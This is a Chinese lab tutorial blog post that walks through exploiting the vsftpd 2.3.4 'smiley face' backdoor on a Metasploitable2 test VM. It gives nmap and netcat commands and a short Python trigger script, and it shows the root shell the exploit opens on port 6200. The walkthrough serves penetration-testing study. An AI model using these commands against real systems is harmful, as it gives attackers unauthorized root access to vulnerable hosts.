Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成“后门”
测试环境
攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248)
靶机:Metasploitable2 - Linux (IP:192.168.68.205)
攻击工具:Netcat(nc) “瑞士军刀”
扫描工具:Nmap version 7.92
漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200端口打开一个连接,从而通过这个连接失效对目标主机的控制。关于“笑脸漏洞”大家可以自行搜索一下相关信息。
测试步骤
1. 攻击上运行nmap扫描
┌──(kali㉿kali)-[~]
└─$ nmap --script ftp-vsftpd-backdoor 192.168.68.205
2. Netcat 扫描端口测试连接
以靶机80端口为例测试,命令如下:
┌──(kali㉿kali)-[~]
└─$ nc -v 192.168.68.205 80
192.168.68.205: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.68.205] 80 (http) open
可以看到这个端口状态为open, 也就是开放的。接下来试一下可否通过80端口控制目标, 命令如下:
┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 80
测试完成之后,系统会暂时没有反应。再输入一条Linux操作系统用于现实用户名称的whoami命令,以此来查看是否能通过80端口来控制目标,如下图所示:
虽然出现了如上提示,但这只是Metasploittable2的欢迎界面,尝试失败。
3. 激活笑脸漏洞,开启6200端口
分享一段注入脚本代码,如下:
import socket
from ftplib import FTP
host_ip = '192.168.68.205'
ftp = FTP()
backdoorstr = 'hello:)'
backdoorpass = "it's me"
try:ftp.connect(host_ip, 21, timeout = 2)ftp.login(backdoorstr, backdoorpass)
except:print('完成笑脸注入')
先运行注入脚本,如上图所示,注入成功。然后运行如下命令:
┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200
运行结果如下图:
虽然只显示了一个光标,但是对Netcat表示已经成功连接了。
4. 输入测试命令
输入如下命令,得到回应–root
┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200 1 ⨯
whoami
root
以root身份登录,然后输入其他测试命令,如“ls”、 “cd”、 “pwd”也都成功,如下图所示:
通过如上测试,可以看到6200端口上运行的vsftd-2.3.4。当用户名中存在“:)”两个连续的符号时,就会激活vsf_sysutil_extra函数,这个函数会在本地建立一个socket,然后绑定到6200端口,之后调用exec函数绑定/bin/sh。
Kali渗透测试-远程控制:6200端口变成“后门”相关推荐
- Kali渗透测试:通过Web应用程序实现远程控制
Kali渗透测试:通过Web应用程序实现远程控制 我们所接触的PHP.JSP这样的语言主要是用来开发Web应用程序的,但其实他们的功能十分强大,也可以实现远程控制的功能.我们经常听说的" ...
- Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹
Kali渗透测试:远程控制被控端免杀及DLL生成.注入反弹 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的 ...
- Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...
- 渗透测试中常用端口及利用
渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...
- 渗透测试中的端口利用
渗透测试中的端口利用 我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可 ...
- 学习Kali渗透测试笔记
Kali渗透测试 一.什么是渗透测试 1. 软件测试 2. 安全测试与渗透测试 3.渗透测试 二.渗透测试的目标 1. 网络硬件设备 2. 主机操作系统 3. 应用系统 4. 数据库系统 三.渗透测试 ...
- Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端 Armitage就是一款使用Java为Metasploit编写的有图形化操作界面的软件,通过它可以轻松的使用Metasploit对目标进行攻 ...
- Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...
- kali渗透测试系列---信息收集
kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...
最新文章
- python中文件读写位置的作用-文件操作,读,写,指定位置
- 34.16.159(zz)
- python基础教程:操作符
- java对xml文件的解析_Java对XML文件的解析
- [总结]DataGrid 固定表头实现(纵向和横向滚动条滚动,而Header不动)
- asp.net web常用控件FileUpload(文件上传控件)
- Storm ack和fail机制再论
- 不同图像锐化算子提取的图像信息有哪些不同_传统图像处理
- C++ - extern C用法浅析
- ubuntu增加磁盘容量
- 快速排序中pivot的选取策略
- 系统架构师 项目经理 哪个更有前景_OLED和QLED电视有什么区别?哪个更好更有前景?...
- 学习用PS美化软件界面
- exynos 4412 电源管理芯片PMIC 的配置及使用方法
- 数据的准确性对模型效果的重要性
- STM32延时函数的四种方法
- 如何解读测试结果出现负数
- VS调用大恒相机sdk实时显示图像并进行图像处理+OPENCV
- mplayer全参数
- C语言数据结构代码——有向图